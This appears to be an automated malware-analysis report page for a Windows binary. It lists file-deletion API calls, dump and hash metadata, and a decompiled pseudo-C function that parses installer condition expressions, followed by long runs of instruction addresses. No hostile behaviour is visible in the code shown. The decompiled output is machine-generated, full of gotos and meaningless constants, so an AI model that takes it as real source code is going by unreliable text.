                                                                                                                                                                  • GetFileAttributesW.KERNEL32(004125A6,?,?,?,00000001,80004005,00000000), ref: 00437488
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 0043749B
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,80004005,00000000), ref: 004374E7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004374F1
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,80004005,00000000), ref: 0043753E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437548
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,?,00000001,80004005,00000000), ref: 00437596
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004375A9
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,80004005,00000000), ref: 00437683
                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000001,80004005,00000000), ref: 00437697
                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,80004005,00000000), ref: 004376C2
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,80004005,00000000), ref: 004376E5
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,80004005,00000000), ref: 004376FE
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,80004005,00000000), ref: 00437708
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437716
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,?,?,00000001,80004005,00000000), ref: 0043772A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437738
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,80004005,00000000), ref: 0043775E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437787
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004377A9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004377CB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004377ED
                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,00000001,80004005,00000000), ref: 00437823
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                                  • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                                  • API String ID: 1544372074-1252831301
                                                                                                                                                                  • Opcode ID: ff15a5ff8e6dd2613c8f2ac8fd9824e12e9b0305dd7ddf123cd3d42f7810a1dd
                                                                                                                                                                  • Instruction ID: f4a30c99753e662d69791e8fe703a85e964cd615430bb2bb27ab4dbbde91187f
                                                                                                                                                                  • Opcode Fuzzy Hash: ff15a5ff8e6dd2613c8f2ac8fd9824e12e9b0305dd7ddf123cd3d42f7810a1dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FA1FCB1D05334AAEB3096758C44BEBB6E9EF48750F011267ED48F7290D7399D41CAE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004050BA, Relevance: 38.9, APIs: 8, Strings: 14, Instructions: 440COMMONCrypto
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E004050BA(void* __eflags, signed int _a4) {
				short _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				signed int _t131;
				void* _t132;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t143;
				void* _t145;
				void* _t146;
				void* _t148;
				void* _t151;
				void* _t152;
				signed int _t157;
				int _t160;
				signed int _t166;
				short* _t178;
				int _t182;
				short* _t184;
				void* _t199;
				void* _t200;
				signed int _t202;
				void* _t203;
				signed short* _t204;
				void* _t209;
				signed int _t214;
				signed int _t215;
				signed short* _t218;
				signed int _t219;
				void* _t222;
				void _t224;
				void* _t225;
				void* _t228;
				void* _t230;
				signed int _t235;
				void* _t237;
				void* _t238;
				void* _t240;
				int _t241;
				signed int _t242;
				void* _t251;

				_t214 = _a4;
				_v8 = 0;
				_t241 = 0;
				_t3 = _t214 + 0x18; // 0x4059ae
				E00418E52(_t3);
				_t4 = _t214 + 0x10; // 0x4059a6
				_t228 = _t4;
				_t215 = 6;
				memset(_t228, 0, _t215 << 2);
				_t6 = _t214 + 8; // 0xeb0043d5
				if(0 !=  *((intOrPtr*)( *_t6))) {
					while(1) {
						_t8 = _t214 + 8; // 0xeb0043d5
						GetStringTypeW(1,  *_t8, 1,  &_v8);
						if((_v8 & 0x00000040) == 0) {
							break;
						}
						 *(_t214 + 8) =  &(( *(_t214 + 8))[1]);
						_t14 = _t214 + 8; // 0xeb0043d5
						if(0 !=  *((intOrPtr*)( *_t14))) {
							continue;
						}
						break;
					}
					_t15 = _t214 + 0x10; // 0x4059a6
					_t228 = _t15;
				}
				_t16 = _t214 + 8; // 0xeb0043d5
				_t218 =  *_t16;
				_t17 = _t214 + 4; // 0x54680779
				_v12 = _t218 -  *_t17 >> 1;
				_t131 =  *_t218 & 0x0000ffff;
				_t251 = _t131 - 0x3c;
				if(_t251 > 0) {
					_t132 = _t131 - 0x3d;
					if(_t132 == 0) {
						 *_t228 = 0x10009;
						goto L23;
					} else {
						_t136 = _t132 - 1;
						if(_t136 == 0) {
							_t138 = (_t218[1] & 0x0000ffff) - 0x3c;
							if(_t138 == 0) {
								 *_t228 = 0x1000b;
								goto L103;
							} else {
								_t139 = _t138 - 1;
								if(_t139 == 0) {
									 *_t228 = 0x10008;
									goto L103;
								} else {
									if(_t139 == 1) {
										 *_t228 = 0x1000d;
										goto L103;
									} else {
										 *_t228 = 0x10006;
										goto L23;
									}
								}
							}
						} else {
							if(_t136 == 0x40) {
								_t143 = (_t218[1] & 0x0000ffff) - 0x3c;
								if(_t143 == 0) {
									_t145 = (_t218[2] & 0x0000ffff) - 0x3c;
									if(_t145 == 0) {
										 *_t228 = 0x3000c;
										goto L93;
									} else {
										_t146 = _t145 - 1;
										if(_t146 == 0) {
											 *_t228 = 0x30007;
											goto L93;
										} else {
											_t235 = 0;
											if(_t146 == 1) {
												 *_t228 = 0x3000a;
												goto L89;
											} else {
												 *_t228 = 0x30005;
												goto L87;
											}
											goto L90;
										}
									}
									goto L106;
								} else {
									_t148 = _t143 - 1;
									if(_t148 == 0) {
										 *_t228 = 0x30009;
										goto L103;
									} else {
										_t149 = _t148 == 1;
										if(_t148 == 1) {
											_t151 = (_t218[2] & 0x0000ffff) - 0x3c;
											if(_t151 == 0) {
												 *_t228 = 0x3000b;
												goto L93;
											} else {
												_t152 = _t151 - 1;
												if(_t152 == 0) {
													 *_t228 = 0x30008;
													L93:
													_push(3);
													goto L94;
												} else {
													_t235 = 0;
													if(_t152 == 1) {
														 *_t228 = 0x3000d;
														L89:
														_push(3);
													} else {
														 *_t228 = 0x30006;
														L87:
														_push(2);
													}
													L90:
													_pop(_t241);
												}
											}
											goto L106;
										} else {
											_t242 = 0x8007000d;
											 *(_t214 + 0x28) = 1;
											_t235 = 0x8007000d;
											E004300D9(_t149, "condition.cpp", 0x237, 0x8007000d);
											_push(_v12);
											_t112 = _t214 + 4; // 0x54680779
											_push( *_t112);
											_push("Failed to parse condition \"%ls\". Unexpected \'~\' operator at position %d.");
											goto L36;
										}
									}
								}
							} else {
								goto L31;
							}
						}
					}
				} else {
					if(_t251 == 0) {
						_t199 = (_t218[1] & 0x0000ffff) - 0x3c;
						if(_t199 == 0) {
							 *_t228 = 0x1000c;
							goto L103;
						} else {
							_t200 = _t199 - 1;
							if(_t200 == 0) {
								 *_t228 = 0x10007;
								goto L103;
							} else {
								if(_t200 == 1) {
									 *_t228 = 0x1000a;
									L103:
									_push(2);
									L94:
									_pop(_t241);
								} else {
									 *_t228 = 0x10005;
									L23:
									_t241 = 1;
								}
							}
						}
						_t235 = 0;
						goto L106;
					} else {
						_t235 = 0;
						_t202 = _t131;
						if(_t202 == 0) {
							 *_t228 = 1;
							goto L106;
						} else {
							_v16 = 0x22;
							_t203 = _t202 - 0x22;
							if(_t203 == 0) {
								_t204 = _t218;
								while(1) {
									_a4 = _a4 & 0x00000000;
									_t204 =  &(_t204[1]);
									_t241 = _t241 + 1;
									_t235 =  *_t204 & 0x0000ffff;
									if(_a4 == _t235) {
										break;
									}
									if(_v16 != _t235) {
										continue;
									} else {
										_t241 = _t241 + 1;
										 *_t228 = 0x12;
										_t25 = _t241 - 2; // 0x0
										_t26 =  &(_t218[1]); // 0xeb0043d7
										goto L60;
									}
									goto L107;
								}
								_t242 = 0x8007000d;
								 *(_t214 + 0x28) = 1;
								_t235 = 0x8007000d;
								E004300D9(_t204, "condition.cpp", 0x277, 0x8007000d);
								_push(_v12);
								_t29 = _t214 + 4; // 0x54680779
								_push( *_t29);
								_push("Failed to parse condition \"%ls\". Unterminated literal at position %d.");
								goto L36;
							} else {
								_t209 = _t203 - 6;
								if(_t209 == 0) {
									 *_t228 = 0xe;
									goto L12;
								} else {
									if(_t209 != 1) {
										L31:
										_t157 = _v8;
										if((_t157 & 0x00000004) != 0) {
											L63:
											_t237 = 0x5f;
											while(1) {
												_t241 = _t241 + 1;
												_t160 = GetStringTypeW(1,  &(_t218[_t241]), 1,  &_v8);
												if((_v8 & 0x00000100) != 0) {
													break;
												}
												_t92 = _t214 + 8; // 0xeb0043d5
												_t218 =  *_t92;
												if(_t237 == _t218[_t241]) {
													break;
												} else {
													if((_v8 & 0x00000004) != 0) {
														continue;
													} else {
														asm("xorps xmm0, xmm0");
														 *(_t214 + 0x10) = 0x10;
														asm("movlpd [ebp-0x10], xmm0");
														if(E004345DA(_t218, _t241,  &_v20) >= 0) {
															_t104 = _t214 + 0x18; // 0x4059ae
															_t166 = E00418D81(_t104, _v20, _v16);
															goto L61;
														} else {
															_t242 = 0x8007000d;
															 *(_t214 + 0x28) = 1;
															_t235 = 0x8007000d;
															E004300D9(_t164, "condition.cpp", 0x299, 0x8007000d);
															_push(_v12);
															_t102 = _t214 + 4; // 0x54680779
															_push( *_t102);
															_push("Failed to parse condition \"%ls\". Constant too big, at position %d.");
															goto L36;
														}
													}
												}
												goto L107;
											}
											_t242 = 0x8007000d;
											 *(_t214 + 0x28) = 1;
											_t235 = 0x8007000d;
											E004300D9(_t160, "condition.cpp", 0x28c, 0x8007000d);
											_push(_v12);
											_t108 = _t214 + 4; // 0x54680779
											_push( *_t108);
											_push("Failed to parse condition \"%ls\". Identifier cannot start at a digit, at position %d.");
											goto L36;
										} else {
											_a4 = 0x2d;
											if(_a4 == ( *_t218 & 0x0000ffff)) {
												goto L63;
											} else {
												_t230 = 0x5f;
												if((_t157 & 0x00000100) != 0) {
													L37:
													_t42 =  &(_t218[1]); // 0xeb0043d7
													GetStringTypeW(1, _t42, 1,  &_v8);
													_t43 = _t214 + 8; // 0xeb0043d5
													_t222 = 0x76;
													if(_t222 !=  *((intOrPtr*)( *_t43)) || (_v8 & 0x00000004) == 0) {
														_t238 = 0x5f;
														goto L48;
														do {
															do {
																L48:
																_t66 = _t214 + 8; // 0xeb0043d5
																_t241 = _t241 + 1;
																GetStringTypeW(1,  *_t66 + _t241 + _t241, 1,  &_v8);
															} while ((_v8 & 0x00000100) != 0 || (_v8 & 0x00000004) != 0);
															_t74 = _t214 + 8; // 0xeb0043d5
															_t178 =  *_t74;
														} while (_t238 == _t178[_t241]);
														_t235 = 0;
														if(_t241 != 2) {
															if(_t241 != 3) {
																goto L59;
															} else {
																if(CompareStringW(0x7f, 1, _t178, _t241, L"AND", _t241) != 2) {
																	_t79 = _t214 + 8; // 0xeb0043d5
																	if(CompareStringW(0x7f, 1,  *_t79, 3, L"NOT", 3) != 2) {
																		goto L59;
																	} else {
																		 *(_t214 + 0x10) = 4;
																		goto L106;
																	}
																} else {
																	 *(_t214 + 0x10) = _t241;
																	goto L106;
																}
															}
														} else {
															_t182 = CompareStringW(0x7f, 1, _t178, 2, L"OR", 2);
															_t224 = 2;
															if(_t182 != _t224) {
																L59:
																_push(_t241);
																_t81 = _t214 + 8; // 0xeb0043d5
																_push( *_t81);
																 *(_t214 + 0x10) = 0x11;
																L60:
																_t83 = _t214 + 0x18; // 0x4059ae
																_t166 = E00418DBD(_t235);
																L61:
																_t219 = _t166;
																_a4 = _t219;
																if(_t219 >= 0) {
																	_t235 = _a4;
																	goto L106;
																} else {
																	_push("Failed to set symbol value.");
																	_push(_t219);
																	E00430A57();
																	_t235 = _a4;
																}
															} else {
																 *(_t214 + 0x10) = _t224;
																goto L106;
															}
														}
													} else {
														_t240 = 1;
														while(1) {
															L40:
															_t47 = _t214 + 8; // 0xeb0043d5
															_t241 = _t241 + 1;
															_t184 =  *_t47 + _t241 * 2;
															_t225 = 0x2e;
															if(_t225 !=  *_t184) {
																break;
															}
															_t240 = _t240 + 1;
															if(_t240 <= 4) {
																continue;
															} else {
																_t242 = 0x8007000d;
																 *(_t214 + 0x28) = 1;
																_t235 = 0x8007000d;
																E004300D9(_t184, "condition.cpp", 0x2b1, 0x8007000d);
																_push(_v12);
																_t52 = _t214 + 4; // 0x54680779
																_push( *_t52);
																_push("Failed to parse condition \"%ls\". Version can have a maximum of 4 parts, at position %d.");
																goto L36;
															}
															goto L107;
														}
														GetStringTypeW(1, _t184, 1,  &_v8);
														if((_v8 & 0x00000004) != 0) {
															goto L40;
														} else {
															_t57 = _t214 + 0x18; // 0x4059ae
															_t58 = _t241 - 1; // 0x0
															_t59 = _t214 + 8; // 0xeb0043d5
															_t235 = E0043720F(_t230,  *_t59 + 2, _t58, _t57);
															if(_t235 >= 0) {
																 *(_t214 + 0x20) = 3;
																 *(_t214 + 0x10) = 0x13;
																goto L106;
															} else {
																_t242 = 0x8007000d;
																 *(_t214 + 0x28) = 1;
																_t235 = 0x8007000d;
																E004300D9(_t190, "condition.cpp", 0x2c3, 0x8007000d);
																_push(_v12);
																_t62 = _t214 + 4; // 0x54680779
																_push( *_t62);
																_push("Failed to parse condition \"%ls\". Invalid version format, at position %d.");
																goto L36;
															}
														}
													}
												} else {
													_t195 =  *_t218 & 0x0000ffff;
													if(_t230 == ( *_t218 & 0x0000ffff)) {
														goto L37;
													} else {
														_t242 = 0x8007000d;
														 *(_t214 + 0x28) = 1;
														_t235 = 0x8007000d;
														E004300D9(_t195, "condition.cpp", 0x2ee, 0x8007000d);
														_push(_v12);
														_t40 = _t214 + 4; // 0x54680779
														_push( *_t40);
														_push("Failed to parse condition \"%ls\". Unexpected character at position %d.");
														L36:
														_push(_t242);
														E00430A57();
													}
												}
											}
										}
									} else {
										 *_t228 = 0xf;
										L12:
										_t241 = 1;
										L106:
										 *(_t214 + 0x14) = _v12;
										 *(_t214 + 8) =  *(_t214 + 8) + _t241 + _t241;
									}
								}
							}
						}
					}
				}
				L107:
				return _t235;
			}















































                                                                                                                                                                  0x004050c1
                                                                                                                                                                  0x004050c7
                                                                                                                                                                  0x004050ca
                                                                                                                                                                  0x004050cd
                                                                                                                                                                  0x004050d1
                                                                                                                                                                  0x004050d6
                                                                                                                                                                  0x004050d6
                                                                                                                                                                  0x004050dd
                                                                                                                                                                  0x004050e0
                                                                                                                                                                  0x004050e2
                                                                                                                                                                  0x004050ed
                                                                                                                                                                  0x004050ef
                                                                                                                                                                  0x004050f4
                                                                                                                                                                  0x004050f8
                                                                                                                                                                  0x00405102
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405104
                                                                                                                                                                  0x00405108
                                                                                                                                                                  0x00405110
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405110
                                                                                                                                                                  0x00405112
                                                                                                                                                                  0x00405112
                                                                                                                                                                  0x00405112
                                                                                                                                                                  0x00405115
                                                                                                                                                                  0x00405115
                                                                                                                                                                  0x0040511a
                                                                                                                                                                  0x0040511f
                                                                                                                                                                  0x00405122
                                                                                                                                                                  0x00405125
                                                                                                                                                                  0x00405128
                                                                                                                                                                  0x00405210
                                                                                                                                                                  0x00405213
                                                                                                                                                                  0x004055f3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405219
                                                                                                                                                                  0x00405219
                                                                                                                                                                  0x0040521a
                                                                                                                                                                  0x004055c3
                                                                                                                                                                  0x004055c6
                                                                                                                                                                  0x004055e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004055c8
                                                                                                                                                                  0x004055c8
                                                                                                                                                                  0x004055c9
                                                                                                                                                                  0x004055e1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004055cb
                                                                                                                                                                  0x004055cc
                                                                                                                                                                  0x004055d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004055ce
                                                                                                                                                                  0x004055ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004055ce
                                                                                                                                                                  0x004055cc
                                                                                                                                                                  0x004055c9
                                                                                                                                                                  0x00405220
                                                                                                                                                                  0x00405223
                                                                                                                                                                  0x00405515
                                                                                                                                                                  0x00405518
                                                                                                                                                                  0x00405588
                                                                                                                                                                  0x0040558b
                                                                                                                                                                  0x004055b2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040558d
                                                                                                                                                                  0x0040558d
                                                                                                                                                                  0x0040558e
                                                                                                                                                                  0x004055aa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405590
                                                                                                                                                                  0x00405590
                                                                                                                                                                  0x00405593
                                                                                                                                                                  0x0040559f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405595
                                                                                                                                                                  0x00405595
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405595
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405593
                                                                                                                                                                  0x0040558e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040551a
                                                                                                                                                                  0x0040551a
                                                                                                                                                                  0x0040551b
                                                                                                                                                                  0x0040557c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040551d
                                                                                                                                                                  0x0040551d
                                                                                                                                                                  0x0040551e
                                                                                                                                                                  0x0040554f
                                                                                                                                                                  0x00405552
                                                                                                                                                                  0x00405574
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405554
                                                                                                                                                                  0x00405554
                                                                                                                                                                  0x00405555
                                                                                                                                                                  0x0040556c
                                                                                                                                                                  0x004055b8
                                                                                                                                                                  0x004055b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405557
                                                                                                                                                                  0x00405557
                                                                                                                                                                  0x0040555a
                                                                                                                                                                  0x00405564
                                                                                                                                                                  0x004055a5
                                                                                                                                                                  0x004055a5
                                                                                                                                                                  0x0040555c
                                                                                                                                                                  0x0040555c
                                                                                                                                                                  0x0040559b
                                                                                                                                                                  0x0040559b
                                                                                                                                                                  0x0040559b
                                                                                                                                                                  0x004055a7
                                                                                                                                                                  0x004055a7
                                                                                                                                                                  0x004055a7
                                                                                                                                                                  0x00405555
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405520
                                                                                                                                                                  0x00405520
                                                                                                                                                                  0x0040552b
                                                                                                                                                                  0x00405533
                                                                                                                                                                  0x00405535
                                                                                                                                                                  0x0040553d
                                                                                                                                                                  0x0040553e
                                                                                                                                                                  0x0040553e
                                                                                                                                                                  0x00405541
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405541
                                                                                                                                                                  0x0040551e
                                                                                                                                                                  0x0040551b
                                                                                                                                                                  0x00405229
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405229
                                                                                                                                                                  0x00405223
                                                                                                                                                                  0x0040521a
                                                                                                                                                                  0x0040512e
                                                                                                                                                                  0x0040512e
                                                                                                                                                                  0x004051d7
                                                                                                                                                                  0x004051da
                                                                                                                                                                  0x00405205
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004051dc
                                                                                                                                                                  0x004051dc
                                                                                                                                                                  0x004051dd
                                                                                                                                                                  0x004051fa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004051df
                                                                                                                                                                  0x004051e0
                                                                                                                                                                  0x004051ef
                                                                                                                                                                  0x004055ef
                                                                                                                                                                  0x004055ef
                                                                                                                                                                  0x004055ba
                                                                                                                                                                  0x004055ba
                                                                                                                                                                  0x004051e2
                                                                                                                                                                  0x004051e2
                                                                                                                                                                  0x004051e8
                                                                                                                                                                  0x004051e8
                                                                                                                                                                  0x004051e8
                                                                                                                                                                  0x004051e0
                                                                                                                                                                  0x004051dd
                                                                                                                                                                  0x004055bb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405134
                                                                                                                                                                  0x00405134
                                                                                                                                                                  0x00405136
                                                                                                                                                                  0x00405138
                                                                                                                                                                  0x004051c8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040513e
                                                                                                                                                                  0x0040513e
                                                                                                                                                                  0x00405145
                                                                                                                                                                  0x00405148
                                                                                                                                                                  0x0040516c
                                                                                                                                                                  0x0040516e
                                                                                                                                                                  0x0040516e
                                                                                                                                                                  0x00405172
                                                                                                                                                                  0x00405175
                                                                                                                                                                  0x00405176
                                                                                                                                                                  0x0040517d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405183
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405185
                                                                                                                                                                  0x00405185
                                                                                                                                                                  0x00405186
                                                                                                                                                                  0x0040518c
                                                                                                                                                                  0x00405190
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405193
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405183
                                                                                                                                                                  0x00405199
                                                                                                                                                                  0x004051a9
                                                                                                                                                                  0x004051b0
                                                                                                                                                                  0x004051b2
                                                                                                                                                                  0x004051ba
                                                                                                                                                                  0x004051bb
                                                                                                                                                                  0x004051bb
                                                                                                                                                                  0x004051be
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040514a
                                                                                                                                                                  0x0040514a
                                                                                                                                                                  0x0040514d
                                                                                                                                                                  0x0040515e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040514f
                                                                                                                                                                  0x00405150
                                                                                                                                                                  0x0040522b
                                                                                                                                                                  0x0040522b
                                                                                                                                                                  0x00405230
                                                                                                                                                                  0x00405453
                                                                                                                                                                  0x00405455
                                                                                                                                                                  0x00405456
                                                                                                                                                                  0x0040545a
                                                                                                                                                                  0x00405463
                                                                                                                                                                  0x00405470
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405472
                                                                                                                                                                  0x00405472
                                                                                                                                                                  0x00405479
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040547b
                                                                                                                                                                  0x0040547f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405481
                                                                                                                                                                  0x00405486
                                                                                                                                                                  0x0040548a
                                                                                                                                                                  0x00405491
                                                                                                                                                                  0x0040549d
                                                                                                                                                                  0x004054d1
                                                                                                                                                                  0x004054d8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040549f
                                                                                                                                                                  0x0040549f
                                                                                                                                                                  0x004054af
                                                                                                                                                                  0x004054b6
                                                                                                                                                                  0x004054b8
                                                                                                                                                                  0x004054c0
                                                                                                                                                                  0x004054c1
                                                                                                                                                                  0x004054c1
                                                                                                                                                                  0x004054c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004054c4
                                                                                                                                                                  0x0040549d
                                                                                                                                                                  0x0040547f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405479
                                                                                                                                                                  0x004054e2
                                                                                                                                                                  0x004054f2
                                                                                                                                                                  0x004054f9
                                                                                                                                                                  0x004054fb
                                                                                                                                                                  0x00405503
                                                                                                                                                                  0x00405504
                                                                                                                                                                  0x00405504
                                                                                                                                                                  0x00405507
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405236
                                                                                                                                                                  0x00405239
                                                                                                                                                                  0x00405244
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040524a
                                                                                                                                                                  0x0040524c
                                                                                                                                                                  0x00405252
                                                                                                                                                                  0x00405294
                                                                                                                                                                  0x0040529a
                                                                                                                                                                  0x004052a0
                                                                                                                                                                  0x004052a6
                                                                                                                                                                  0x004052ab
                                                                                                                                                                  0x004052af
                                                                                                                                                                  0x00405376
                                                                                                                                                                  0x00405376
                                                                                                                                                                  0x00405377
                                                                                                                                                                  0x00405377
                                                                                                                                                                  0x00405377
                                                                                                                                                                  0x0040537b
                                                                                                                                                                  0x0040537e
                                                                                                                                                                  0x00405389
                                                                                                                                                                  0x0040538f
                                                                                                                                                                  0x0040539e
                                                                                                                                                                  0x0040539e
                                                                                                                                                                  0x004053a1
                                                                                                                                                                  0x004053a9
                                                                                                                                                                  0x004053ad
                                                                                                                                                                  0x004053d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004053d7
                                                                                                                                                                  0x004053ec
                                                                                                                                                                  0x004053ff
                                                                                                                                                                  0x0040540f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405411
                                                                                                                                                                  0x00405411
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405411
                                                                                                                                                                  0x004053ee
                                                                                                                                                                  0x004053ee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004053ee
                                                                                                                                                                  0x004053ec
                                                                                                                                                                  0x004053af
                                                                                                                                                                  0x004053bd
                                                                                                                                                                  0x004053c5
                                                                                                                                                                  0x004053c8
                                                                                                                                                                  0x0040541d
                                                                                                                                                                  0x0040541d
                                                                                                                                                                  0x0040541e
                                                                                                                                                                  0x0040541e
                                                                                                                                                                  0x00405421
                                                                                                                                                                  0x00405428
                                                                                                                                                                  0x00405428
                                                                                                                                                                  0x0040542c
                                                                                                                                                                  0x00405431
                                                                                                                                                                  0x00405431
                                                                                                                                                                  0x00405433
                                                                                                                                                                  0x00405438
                                                                                                                                                                  0x004055fe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040543e
                                                                                                                                                                  0x0040543e
                                                                                                                                                                  0x00405443
                                                                                                                                                                  0x00405444
                                                                                                                                                                  0x00405449
                                                                                                                                                                  0x0040544d
                                                                                                                                                                  0x004053ca
                                                                                                                                                                  0x004053ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004053ca
                                                                                                                                                                  0x004053c8
                                                                                                                                                                  0x004052bf
                                                                                                                                                                  0x004052c1
                                                                                                                                                                  0x004052c2
                                                                                                                                                                  0x004052c2
                                                                                                                                                                  0x004052c2
                                                                                                                                                                  0x004052c5
                                                                                                                                                                  0x004052c8
                                                                                                                                                                  0x004052cb
                                                                                                                                                                  0x004052cf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004052d1
                                                                                                                                                                  0x004052d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004052d7
                                                                                                                                                                  0x004052d7
                                                                                                                                                                  0x004052e7
                                                                                                                                                                  0x004052ee
                                                                                                                                                                  0x004052f0
                                                                                                                                                                  0x004052f8
                                                                                                                                                                  0x004052f9
                                                                                                                                                                  0x004052f9
                                                                                                                                                                  0x004052fc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004052fc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004052d5
                                                                                                                                                                  0x0040530c
                                                                                                                                                                  0x00405316
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405318
                                                                                                                                                                  0x00405318
                                                                                                                                                                  0x0040531c
                                                                                                                                                                  0x00405320
                                                                                                                                                                  0x0040532c
                                                                                                                                                                  0x00405330
                                                                                                                                                                  0x00405361
                                                                                                                                                                  0x00405368
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405332
                                                                                                                                                                  0x00405332
                                                                                                                                                                  0x00405342
                                                                                                                                                                  0x00405349
                                                                                                                                                                  0x0040534b
                                                                                                                                                                  0x00405353
                                                                                                                                                                  0x00405354
                                                                                                                                                                  0x00405354
                                                                                                                                                                  0x00405357
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405357
                                                                                                                                                                  0x00405330
                                                                                                                                                                  0x00405316
                                                                                                                                                                  0x00405254
                                                                                                                                                                  0x00405254
                                                                                                                                                                  0x0040525a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040525c
                                                                                                                                                                  0x0040525c
